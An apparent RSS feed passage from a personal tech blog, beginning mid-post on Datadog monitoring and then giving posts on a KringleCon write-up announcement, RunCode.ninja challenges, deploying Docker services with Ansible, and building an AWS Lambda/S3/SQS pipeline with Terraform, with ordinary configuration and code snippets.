&lt;a href="https://docs.datadoghq.com/dashboards/screenboards/" target="_blank" rel="noopener">screen-board&lt;/a> which I created to display the status of a Monitor that I set up previously. This Monitor tracks incoming events with the tag &lt;strong>cloud_job_metric&lt;/strong> and generates an alert, if there is not at least one such event of type &lt;strong>success&lt;/strong> in the last 30 minutes. The screen-board can be exported via a public URL if needed, or just simply displayed on a big screen somewhere in the office.&lt;/p>
&lt;h2 id="conclusions">Conclusions&lt;/h2>
&lt;p>In this post I discussed a relatively complex project with lots of exciting technology working together in the realm of Cloud Computing. In the end, I was able to create Dashboards and Monitors in DataDog, which can ingest and display telemetry about AWS workloads, in a way that makes it useful to track and monitor the workloads themselves.&lt;/p></description></item><item><title>KringleCon II</title><link>https://flrnks.netlify.app/post/kringlecon-writeup/</link><pubDate>Mon, 13 Jan 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/kringlecon-writeup/</guid><description>&lt;p>In this post I just wanted to announce and link to my write-up in the Tutorials section of my blog, which chronicles my solution to the challenges of the most fun CTF of the holiday season.&lt;/p>
&lt;p>&lt;img src="sans-main.png" alt="HHC 2019">&lt;/p>
&lt;p>A huge thank you goes out to the SANS Institute and the Counter Hack Team who are the organisers of this event. They put a great deal of energy and effort year after year to host this event. It is no wonder the campus of the Elf University was sometimes so crowded, you could barely see your own avatar! :)&lt;/p>
&lt;p>&lt;img src="crowd.png" alt="Crowds at Elf University">&lt;/p>
&lt;p>To get to the write-up, either click
&lt;a href="https://flrnks.netlify.app/tutorials/kringlecon2019/">this&lt;/a> link, or manually go to the Tutorials section in the top bar. I also welcome any kind of feedback or comment on the write-up, to do so please hit the Contact link in the top bar.&lt;/p></description></item><item><title>RunCode.ninja Challenges</title><link>https://flrnks.netlify.app/post/runcode/</link><pubDate>Sat, 11 Jan 2020 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/runcode/</guid><description>&lt;p>This post was born on a misty saturday morning, while slowly sipping some good quality coffe in a Prague café. The last several days after work was over I spent solving programming challenges on
&lt;a href="https://runcode.ninja/" target="_blank" rel="noopener">runcode.ninja&lt;/a> and I thought it would be nice to share my experience and spread the word about it.&lt;/p>
&lt;h3 id="runcodeninja">RunCode.ninja&lt;/h3>
&lt;p>I can&amp;rsquo;t really recall how I discovered this website in the first place&amp;hellip; All I remember is that I was really into the simplistic idea of it all. The basic idea for most of the challenges goes something like this:&lt;/p>
&lt;ul>
&lt;li>check problem description&lt;/li>
&lt;li>inspect any sample input (if any)&lt;/li>
&lt;li>write your program locally&lt;/li>
&lt;li>test on sample input (if any)&lt;/li>
&lt;li>submit source code to the evaluation platform&lt;/li>
&lt;/ul>
&lt;p>If all goes well, you get feedback within a few seconds on whether the submitted code worked correctly for the task at hand. If it didn&amp;rsquo;t, you can turn to their
&lt;a href="https://runcode.ninja/faq" target="_blank" rel="noopener">FAQ&lt;/a> for some advice. It definitely has some useful info; however, if all else fails, you can also contact the team behind the platform on their Slack
&lt;a href="https://runcodeslack.slack.com">channel&lt;/a>. They are really friendly people, so be sure to respond to their effort in kind!&lt;/p>
&lt;p>&lt;img src="runcode.png" alt="easy-category">&lt;/p>
&lt;p>Another nice thing about their platform is that they organised all their challenges (119 in total as of now) into categories such as &lt;code>binary, encoding, encryption, forensics, etc.&lt;/code> which lets you pick what you are interested in. When I started out, I first aimed to complete the challenges in &lt;code>Easy&lt;/code>, which offers a combination of relatively easy challenges from &lt;code>math, text-parsing, encoding&lt;/code> and other categories.&lt;/p>
&lt;p>As it currently stands, I rank 155th out of around 2,400 registered users, which seems quite impressive at first, but I suspect there may be quite a few inactive accounts in their database. Also, some hardcore people have already completed all the challenges, which is genuinely impressive. If I could spend just a few cold and rainy weekends working on these, I would probably catch up soon!&lt;/p>
&lt;p>Last but not least, their platform is set up to interpret several different programming languages, so you can solve the challenges in the language you are most comfortable with. Once you solve a challenge, you can access its &lt;code>write-ups&lt;/code>, which provide some very useful inspiration on how others have solved the same problem. This can teach some very valuable lessons, like that one time when I wrote a 20-line Go program to solve a challenge that took only 1 line in Bash&amp;hellip;&lt;/p>
&lt;p>If you are interested to check out my solutions for some of the challenges, you can find them in my GitHub
&lt;a href="https://github.com/florianakos/codewarz" target="_blank" rel="noopener">repository&lt;/a>. For some of them I even created two different solutions, one in Python and another Go, just to compare and practice working with both languages.&lt;/p>
&lt;p>Oh and I almost forgot to mention, they have some really cool stickers that they are not shy to send half-way across the world by post, so that&amp;rsquo;s another big plus for sticker fans :)&lt;/p>
&lt;p>&lt;img src="sticker.png" alt="sticket">&lt;/p>
&lt;p>That&amp;rsquo;s all for now, thank you for tuning in! :)&lt;/p></description></item><item><title>Docker with Ansible</title><link>https://flrnks.netlify.app/post/ansible-docker/</link><pubDate>Fri, 13 Dec 2019 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/ansible-docker/</guid><description>&lt;h2 id="introduction">Introduction&lt;/h2>
&lt;p>This post was written as a kind of learning diary for my most recent venture into the world of automation through &lt;code>Ansible&lt;/code>. The project I implemented uses Docker to package 2 services into a micro-services architecture and Ansible to build and deploy those services on remote hosts (with the help of Docker Compose).&lt;/p>
&lt;h3 id="the-idea">The Idea&lt;/h3>
&lt;p>The service implements a file-processing utility which monitors the file-system (a particular folder), grabs any newly created files and stores them, compressed, in another folder. Interacting with the service is possible through a web interface which offers a way to upload files, view simple statistics and request email summaries.&lt;/p>
&lt;h3 id="the-approach">The Approach&lt;/h3>
&lt;p>The first idea was to write it all in Go, because I am quite comfortable with the language. However, after a few searches on the interweb, I discovered that a handy UNIX utility already exists for my exact use-case: &lt;code>inotify&lt;/code>. While Go has some packages that offer wrappers around this utility, I eventually decided to just write a bash script around the &lt;code>inotify&lt;/code> tool, instead of relying on Go for all parts of this service. This also gave me a convenient excuse to split the service into a 2-piece set, both of which can be deployed and scaled independently, in the spirit of micro-service architecture. Next, I set out to learn enough Ansible to deploy the service packaged in Docker containers.&lt;/p>
&lt;h2 id="ansible-101">ANSIBLE 101&lt;/h2>
&lt;p>Before this project, I never had the chance to use Ansible, but I had wanted to learn about it for quite a while, so here I will describe it briefly for those who are also at the start of their journey with Ansible.&lt;/p>
&lt;p>At the basic level, it is a tool for provisioning and configuring applications on remote systems in an automated fashion. To achieve the automation it uses so-called &lt;code>playbooks&lt;/code>, which define what steps are necessary to reach a desired state for remote systems. It runs mainly on UNIX systems, but is able to provision and configure both UNIX and Windows based systems.&lt;/p>
&lt;p>It is an &lt;code>agentless&lt;/code> tool, which means it does not require any special software to be installed on the remote hosts. Instead it relies on an SSH connection to remote hosts, through which bash or PowerShell utilities are used to carry out the necessary steps.&lt;/p>
&lt;p>Ansible uses an &lt;code>inventory&lt;/code> that describes the remote systems that can be provisioned through the playbooks. Inventories can be defined statically in the local filesystem on the Ansible master node, or pulled dynamically from remote systems as well.&lt;/p>
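&lt;p>For illustration, a minimal static inventory could look like this (the group name, hostnames and addresses are made up):&lt;/p>

```ini
# inventory.ini - static inventory listing two slave VMs
[webservers]
slave1 ansible_host=192.168.56.101
slave2 ansible_host=192.168.56.102

[webservers:vars]
ansible_user=ubuntu
```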
&lt;h2 id="ansible-meets-docker">ANSIBLE MEETS DOCKER&lt;/h2>
&lt;p>For the purpose of this project, the main use of Ansible lies in its ability to build and run Docker containers. While Docker is not strictly needed to deploy this service on multiple remote hosts, it becomes much easier when all the necessary dependencies and the source code are packaged neatly in a container that can be easily shipped. Within the Docker container, all dependencies are set up and the service is configured in a reliable and consistent manner, while Ansible takes care of deploying and running the service.&lt;/p>
&lt;p>It is worth mentioning that other tools exist, such as Kubernetes, Docker Swarm and others, which focus more on shipping containerised applications. This blog post, however, will not deal with those, but focus entirely on Ansible and Docker instead. Future posts may discuss those alternatives in more detail.&lt;/p>
&lt;p>Below is a brief summary of the proposed architecture that depicts how Ansible and Docker are used together to achieve the desired state of deploying the containerised service on each Ansible host.&lt;/p>
&lt;p>&lt;img src="ansib-meets-dock.png" alt="Ansible meets Docker">&lt;/p>
&lt;p>Detailed instructions are out of scope for this post as well, but briefly: the above shows a snapshot of my local environment using virtual machines in VirtualBox. First, I created a master VM with Ubuntu Desktop and then two slave VMs with Ubuntu server (no GUI necessary). Ansible was installed on the Master node and proper SSH access was configured for both slave VMs from the master VM. In the Ansible playbook used to deploy the service on remote systems, the first few tasks were about installing necessary dependencies and setting up a local docker environment, which can later build and run containerised applications.&lt;/p>
&lt;h2 id="monolithic-vs-microservice">MONOLITHIC VS MICROSERVICE&lt;/h2>
&lt;p>Before discussing how Ansible was used to deploy the service on remote machines using Docker, it is worth going through the building blocks of the service itself. The set of features needed for the service:&lt;/p>
&lt;ul>
&lt;li>file monitoring service that grabs and compresses files&lt;/li>
&lt;li>web interface for file uploads, email sending and service stats&lt;/li>
&lt;/ul>
&lt;p>These features could be implemented in one application that runs all the necessary functions in parallel. In fact, on my first iteration, I opted to solve it this way, packaging all features into a single container. The below figure shows how it worked.&lt;/p>
&lt;p>&lt;img src="monolithic.png" alt="Monolithic Docker">&lt;/p>
&lt;p>However, for the sake of learning, it is worth considering a &lt;code>microservice&lt;/code> approach. This essentially means breaking up big &lt;code>monolithic&lt;/code> applications into smaller sub-components, and Docker is a perfect tool for this. For our purposes, such an architecture could mean deploying 2 separate containers: one for the Web UI backend (for uploads, statistics and email) and another that implements the monitoring and compression service. Below is an updated figure showing the breakup of our previously monolithic approach.&lt;/p>
&lt;p>&lt;img src="microservice.png" alt="Microservice Docker">&lt;/p>
&lt;p>Breaking up the single container from the first iteration into two separate containers lets us reap some benefits of microservice architecture. Our application components can fail independently; for example, a bug in the email-sending service will not bring down the monitoring service. Such an architecture also means we can scale better with demand in the future: if there were a huge surge in requests to the web frontend, we could just deploy more instances of that container and use a load-balancer to distribute requests among them.&lt;/p>
&lt;h2 id="implementation">IMPLEMENTATION&lt;/h2>
&lt;p>To implement the web component, I used simple static HTML served from a &lt;code>GO&lt;/code> backend, which also handled file uploads, sending email notifications and extracting statistical data from a shared SQLite3 database. To implement the file monitoring service, I used the &lt;code>inotify-tools&lt;/code> available on UNIX systems, wrapped in a bash script that took care of the zipping and of generating logs and statistics into the SQLite3 database.&lt;/p>
&lt;h3 id="docker-compose">Docker-Compose&lt;/h3>
&lt;p>Docker Compose was used to enable easier testing and deployment. The definitions in the &lt;code>docker-compose.yml&lt;/code> describe what docker containers should be started with what parameters. The two services defined in the docker-compose correspond to the two containers defined above using the micro-service architecture.&lt;/p>
&lt;p>The &lt;code>webserver&lt;/code> running the GO backend uses a few mounted folders plus an exposed port to let inbound communication reach the server. The &lt;code>monitor&lt;/code> uses 4 folders mounted from the host FS, which enable its core functionality (listening for files and zipping them to a different folder).&lt;/p>
&lt;h3 id="ansible">Ansible&lt;/h3>
&lt;p>Thanks to Docker Compose, it was relatively simple to deploy and run the service with Ansible, once the necessary packages and dependencies are installed on Ansible hosts. All it took was a simple Ansible Task using the docker_compose module:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-yml" data-lang="yml">- &lt;span class="k">name&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>Docker-Compose&lt;span class="w"> &lt;/span>UP&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">docker_compose&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">project_src&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>path_to_docker_compose_yml&lt;span class="w">
&lt;/span>&lt;span class="w"> &lt;/span>&lt;span class="k">build&lt;/span>&lt;span class="p">:&lt;/span>&lt;span class="w"> &lt;/span>yes&lt;span class="w">
&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>While testing the service a few issues were discovered that could be considered bugs, but instead let&amp;rsquo;s call them features!&lt;/p>
&lt;h3 id="feature-1">Feature #1&lt;/h3>
&lt;p>Since the service lets users upload files, sometimes, if the file is large enough, the processing may kick in before the upload has completed. In this case, the file may be corrupted and impossible to recover after unzipping. To mitigate this to a certain extent, a 5-second processing delay has been added to the &lt;code>monitor_service.sh&lt;/code> script, in the hope that the upload finishes during those 5 seconds.&lt;/p>
&lt;h3 id="feature-2">Feature #2&lt;/h3>
&lt;p>While creating the two Dockerfiles describing each component of the service, I wanted to take an extra step and created a non-root user, so that the main process of the service starts as a user which does not have full root access to everything. This worked well while developing and testing on a local system using manual execution via &lt;code>docker-compose up/down&lt;/code> commands. However, once Ansible had been updated to use Docker Compose via the &lt;code>docker_compose&lt;/code> module, certain functionalities broke due to file/folder permission issues. Basically the mounted folders would belong to root, whereas the running process was non-root, so it could not save uploaded files, for example. Further investigation will be done to solve this; until then, the Dockerfiles have been reverted to use root when starting the main processes.&lt;/p>
&lt;h2 id="conclusion">CONCLUSION&lt;/h2>
&lt;p>All in all, working on this project has been a great opportunity to practice such tools as Docker, Docker Compose and Ansible. While I have used Docker briefly before, I have never once used Ansible, and I learnt a great deal about it during this project. I can definitely see how it enables large organisations to streamline their processes when it comes to deploying and configuring various systems and services in their infrastructure. While this project is rather rudimentary, it gave me a good entry to this realm of IT.&lt;/p></description></item><item><title>Infrastructure as Code</title><link>https://flrnks.netlify.app/post/infra-as-code/</link><pubDate>Tue, 12 Nov 2019 11:11:00 +0000</pubDate><guid>https://flrnks.netlify.app/post/infra-as-code/</guid><description>&lt;h2 id="introduction">Introduction&lt;/h2>
&lt;p>In this post I will briefly introduce different AWS services and show how to use Terraform to orchestrate and manage them. While the concept of the whole service is rather simple, its main use is enabling me to learn about this new emerging technology called Infrastructure-as-Code or IaC for short.&lt;/p>
&lt;h2 id="project-overview">Project overview&lt;/h2>
&lt;p>The main goal of this task is to deploy a server-less function that periodically queries the GitHub API to get the list of public repositories for a given organisation (e.g. Google). The retrieved information should then be stored as a compressed CSV file in a specific S3 bucket, while notifications should be created for new files saved to the bucket.&lt;/p>
&lt;p>&lt;img src="arch.png" alt="Go concurrency implemented">&lt;/p>
&lt;p>The main AWS components of the solution are:&lt;/p>
&lt;ul>
&lt;li>Lambda function written in Python&lt;/li>
&lt;li>CW Event Rule to schedule the Lambda periodically&lt;/li>
&lt;li>S3 for storing data in a bucket&lt;/li>
&lt;li>SQS for queueing notifications from S3&lt;/li>
&lt;/ul>
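&lt;p>The heart of the Lambda, turning the API response into a compressed CSV, can be sketched with the Python standard library alone (the chosen columns are my own pick of real GitHub API fields; the HTTP call and S3 upload are left out):&lt;/p>

```python
import csv
import gzip
import io

def repos_to_gzip_csv(repos):
    """Serialise a list of repository records (dicts as returned by the
    GitHub API) into gzip-compressed CSV bytes, ready for S3 upload."""
    buf = io.StringIO()
    writer = csv.DictWriter(
        buf,
        fieldnames=["name", "html_url", "stargazers_count"],
        extrasaction="ignore",  # drop the many other API fields
    )
    writer.writeheader()
    writer.writerows(repos)
    return gzip.compress(buf.getvalue().encode("utf-8"))
```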
&lt;h2 id="possibilities">Possibilities&lt;/h2>
&lt;p>Various methods exist for the creation and configuration of these necessary resources. The simplest one is logging in to the AWS Management Console and setting up each component one by one via the GUI. This method, however, is slow, cumbersome and quite prone to errors.&lt;/p>
&lt;p>A better option can be to use the
&lt;a href="https://aws.amazon.com/tools/" target="_blank" rel="noopener">AWS SDK&lt;/a> for your favourite programming language. Several options exist, such as Java, Python, GO, Node.js, etc&amp;hellip; This option is less error-prone, but still quite cumbersome and slow.&lt;/p>
&lt;p>Perhaps one of the best options is to use Terraform, which is a popular Infrastructure as Code or IaC tool these days. It lets you define your infrastructure in a configuration language and has its own internal engine that talks to the AWS SDK to create the necessary infrastructure you defined.&lt;/p>
&lt;h2 id="setup-procedure">Setup procedure&lt;/h2>
&lt;p>Before we can make use of Terraform to deploy our project on AWS, we need to set up credentials. This can be done by logging in to the AWS management console and going to the Identity and Access Management section, which can provide the necessary Access Key and Secret value that you need to put into a file on disk. These credentials should be saved to &lt;code>~/.aws/credentials&lt;/code> as follows:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">&lt;span class="o">[&lt;/span>default&lt;span class="o">]&lt;/span>
&lt;span class="nv">aws_access_key_id&lt;/span> &lt;span class="o">=&lt;/span> XXXXXXXXXXXX
&lt;span class="nv">aws_secret_access_key&lt;/span> &lt;span class="o">=&lt;/span> XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This enables Terraform to make changes to your AWS infrastructure through API calls to AWS, provisioning resources according to your definitions in the .tf file. Once you create the desired configuration, a complete infrastructure can be deployed as simply as below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-bash" data-lang="bash">$ ▶ ls -la
-rw-r--r-- &lt;span class="m">1&lt;/span> user group 4.9K Nov &lt;span class="m">21&lt;/span> 22:58 main.tf
$ ▶ terraform init
...
Terraform has been successfully initialized!
$ ▶ terraform apply
...
Plan: &lt;span class="m">13&lt;/span> to add, &lt;span class="m">0&lt;/span> to change, &lt;span class="m">2&lt;/span> to destroy.
Do you want to perform these actions?
Enter a value: YES
&lt;/code>&lt;/pre>&lt;/div>&lt;h2 id="project-building-blocks">Project building blocks&lt;/h2>
&lt;p>In this section I will go over each major component and explain what it is, what it does, and how it is set up, starting with the storage layer and then the core logic implemented in Python.&lt;/p>
&lt;h3 id="aws-simple-storage-service">AWS Simple Storage Service&lt;/h3>
&lt;p>This is a basic building block which we use to store the data generated by the Lambda function. Since Lambdas are serverless by nature, they have no persistent storage attached that could save data between two invocations of the function. For persistent storage we use S3. The necessary Terraform code is below:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-tf" data-lang="tf">&lt;span class="kr">resource&lt;/span> &lt;span class="s2">&amp;#34;aws_s3_bucket&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;tf_aws_bucket&amp;#34;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="na">bucket&lt;/span> = &lt;span class="s2">&amp;#34;tf-aws-bucket&amp;#34;&lt;/span>
&lt;span class="na">tags&lt;/span> = &lt;span class="p">{&lt;/span>
&lt;span class="na">Name&lt;/span> = &lt;span class="s2">&amp;#34;Bucket for Terraform project&amp;#34;&lt;/span>
&lt;span class="na">Environment&lt;/span> = &lt;span class="s2">&amp;#34;Dev&amp;#34;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="na">force_destroy&lt;/span> = &lt;span class="s2">&amp;#34;true&amp;#34;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This will create a bucket named &lt;code>tf-aws-bucket&lt;/code> which we can then use to store the results of our Lambda function. As an extra feature, we also configured notifications for this bucket: whenever a compressed object with the &lt;code>.gz&lt;/code> suffix is created in the bucket, a notification is generated and sent to an SQS queue that is also defined in the same Terraform file.&lt;/p>
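&lt;p>The notification wiring itself is not shown above; a minimal Terraform sketch of what it could look like (the queue resource name &lt;code>tf_aws_queue&lt;/code> is my assumption, not the project&amp;rsquo;s actual code) is:&lt;/p>

```tf
# Hypothetical sketch: notify an SQS queue whenever a ".gz" object
# is created in the bucket. The queue name is assumed for illustration.
resource "aws_s3_bucket_notification" "gz_created" {
  bucket = aws_s3_bucket.tf_aws_bucket.id

  queue {
    queue_arn     = aws_sqs_queue.tf_aws_queue.arn
    events        = ["s3:ObjectCreated:*"]
    filter_suffix = ".gz"
  }
}
```

&lt;p>The SQS queue would additionally need a queue policy that allows S3 to send messages to it.&lt;/p>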
&lt;h3 id="aws-lambda">AWS Lambda&lt;/h3>
&lt;p>AWS Lambda is a serverless technology which lets you create a bare function in the cloud and call it from various other services, without having to worry about setting up an environment for it to run in. Several programming languages are supported, such as Python, Java, Go and NodeJS. Once you deploy your code, your function receives input just like any ordinary function, and it can be given permission to access and modify other resources in AWS, such as files stored in S3.&lt;/p>
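&lt;p>For example, a handler that reads its input event, fetches data over HTTP, and writes the result to S3 could be sketched like this. All names, URLs and return values here are illustrative assumptions rather than the project&amp;rsquo;s exact code; &lt;code>boto3&lt;/code> is assumed to be available in the Lambda Python runtime:&lt;/p>

```python
import gzip
import json
import urllib.request


def handler(event, context):
    # reject invocations that are missing the required keys
    if 'org_name' not in event or 'target_bucket' not in event:
        return {"statusCode": 400, "body": "Missing 'org_name' or 'target_bucket'!"}

    org, bucket = event['org_name'], event['target_bucket']

    # fetch the organisation's public repositories from the GitHub API
    url = f"https://api.github.com/orgs/{org}/repos"
    with urllib.request.urlopen(url) as resp:
        repos = json.load(resp)

    # Lambda may only write to /tmp; store name,stars rows as a gzipped CSV
    key = f"{org}-repos.csv.gz"
    path = f"/tmp/{key}"
    with gzip.open(path, "wt") as f:
        for repo in repos:
            f.write(f"{repo['name']},{repo['stargazers_count']}\n")

    # the upload only succeeds if a suitable IAM role is attached;
    # boto3 is imported lazily so the sketch runs locally without it installed
    import boto3
    boto3.client("s3").upload_file(path, bucket, key)
    return {"statusCode": 200, "body": key}
```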
&lt;p>This is exactly the use-case implemented in this project: a Lambda function that calls the GitHub API to download information, then stores it as a compressed CSV file in an S3 bucket. To define the target organisation and the bucket where the information is saved, the Lambda function expects two arguments in the invocation event:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-json" data-lang="json">&lt;span class="p">{&lt;/span>
&lt;span class="nt">&amp;#34;org_name&amp;#34;&lt;/span> &lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;twitter&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="nt">&amp;#34;target_bucket&amp;#34;&lt;/span> &lt;span class="p">:&lt;/span> &lt;span class="s2">&amp;#34;repos_folder&amp;#34;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This JSON input is converted to a Python dictionary, which we can check for the presence of the keys the code needs in order to function correctly:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="k">def&lt;/span> &lt;span class="nf">handler&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">event&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">context&lt;/span>&lt;span class="p">):&lt;/span>
&lt;span class="c1"># verify that URL is passed correctly and create file_name variable based on it&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="s1">&amp;#39;org_name&amp;#39;&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">event&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">keys&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="ow">or&lt;/span> &lt;span class="s1">&amp;#39;target_bucket&amp;#39;&lt;/span> &lt;span class="ow">not&lt;/span> &lt;span class="ow">in&lt;/span> &lt;span class="n">event&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">keys&lt;/span>&lt;span class="p">():&lt;/span>
&lt;span class="k">print&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;Missing &amp;#39;org_name&amp;#39; from request body (JSON)!&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>The rest of the function downloads the list of public repositories of the given organisation from the GitHub API and stores it in a temporary file, which is then uploaded to S3, provided that the necessary permissions have been granted to the Lambda function:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="kn">import&lt;/span> &lt;span class="nn">boto3&lt;/span>
&lt;span class="n">s3&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">boto3&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">client&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;s3&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="n">s3&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">upload_file&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">path_to_local_file&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">target_bucket_name&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="n">key_name&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In order to enable access to S3 from Lambda, we have to define some IAM policies and roles. First we define a policy stating that whichever role it is attached to may access the S3 bucket:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-tf" data-lang="tf">&lt;span class="kr">data&lt;/span> &lt;span class="s2">&amp;#34;aws_iam_policy_document&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_lambda_access&amp;#34;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">statement&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="na">effect&lt;/span> = &lt;span class="s2">&amp;#34;Allow&amp;#34;&lt;/span>
&lt;span class="na">resources&lt;/span> = &lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;arn:aws:s3:::tf-aws-bucket/*&amp;#34;&lt;/span>&lt;span class="p">]&lt;/span>
&lt;span class="na">actions&lt;/span> = &lt;span class="p">[&lt;/span>
&lt;span class="s2">&amp;#34;s3:GetObject&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="s2">&amp;#34;s3:PutObject&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="s2">&amp;#34;s3:ListBucket&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span>
&lt;span class="p">]&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="kr">
&lt;/span>&lt;span class="kr">resource&lt;/span> &lt;span class="s2">&amp;#34;aws_iam_policy&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_lambda_access&amp;#34;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="na">name&lt;/span> = &lt;span class="s2">&amp;#34;s3_lambda_access&amp;#34;&lt;/span>
&lt;span class="na">policy&lt;/span> = &lt;span class="nb">data&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">aws_iam_policy_document&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">s3_lambda_access&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">json&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>This policy is then attached to an IAM role which is allowed to be assumed by AWS Lambda:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-tf" data-lang="tf">&lt;span class="kr">resource&lt;/span> &lt;span class="s2">&amp;#34;aws_iam_role_policy_attachment&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;s3_lambda_access&amp;#34;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="na">role&lt;/span> = &lt;span class="nx">aws_iam_role&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">tf_aws_exercise_role&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">name&lt;/span>
&lt;span class="na">policy_arn&lt;/span> = &lt;span class="nx">aws_iam_policy&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">s3_lambda_access&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">id&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="kr">
&lt;/span>&lt;span class="kr">resource&lt;/span> &lt;span class="s2">&amp;#34;aws_iam_role&amp;#34;&lt;/span> &lt;span class="s2">&amp;#34;tf_aws_exercise_role&amp;#34;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="na">name&lt;/span> = &lt;span class="s2">&amp;#34;tfExerciseRole&amp;#34;&lt;/span>
&lt;span class="na">description&lt;/span> = &lt;span class="s2">&amp;#34;Role that allowed to be assumed by AWS Lambda, which will be taking all actions.&amp;#34;&lt;/span>
&lt;span class="na">tags&lt;/span> = &lt;span class="p">{&lt;/span>
&lt;span class="na">owner&lt;/span> = &lt;span class="s2">&amp;#34;tfExerciseBoss&amp;#34;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="na">assume_role_policy&lt;/span> = &lt;span class="o">&amp;lt;&amp;lt;EOF&lt;/span>&lt;span class="s">
&lt;/span>&lt;span class="s">{
&lt;/span>&lt;span class="s"> &amp;#34;Version&amp;#34;: &amp;#34;2012-10-17&amp;#34;,
&lt;/span>&lt;span class="s"> &amp;#34;Statement&amp;#34;: [
&lt;/span>&lt;span class="s"> {
&lt;/span>&lt;span class="s"> &amp;#34;Action&amp;#34;: &amp;#34;sts:AssumeRole&amp;#34;,
&lt;/span>&lt;span class="s"> &amp;#34;Principal&amp;#34;: {
&lt;/span>&lt;span class="s"> &amp;#34;Service&amp;#34;: &amp;#34;lambda.amazonaws.com&amp;#34;
&lt;/span>&lt;span class="s"> },
&lt;/span>&lt;span class="s"> &amp;#34;Effect&amp;#34;: &amp;#34;Allow&amp;#34;
&lt;/span>&lt;span class="s"> }
&lt;/span>&lt;span class="s"> ]
&lt;/span>&lt;span class="s">}
&lt;/span>&lt;span class="s">&lt;/span>&lt;span class="o">EOF&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;h3 id="aws-cloudwatch-events">AWS CloudWatch Events&lt;/h3>
&lt;p>This component is responsible for periodically invoking our Lambda function with the required arguments passed in JSON format. It was also configured via Terraform, but for the sake of simplicity, below is a screenshot from the AWS Management Console showing the created CloudWatch event rule:&lt;/p>
&lt;p>&lt;img src="cwe.png" alt="Cloudwatch Events Rule">&lt;/p>
&lt;p>The screenshot shows that the rule is configured to execute the target Lambda function every 2 minutes.&lt;/p>
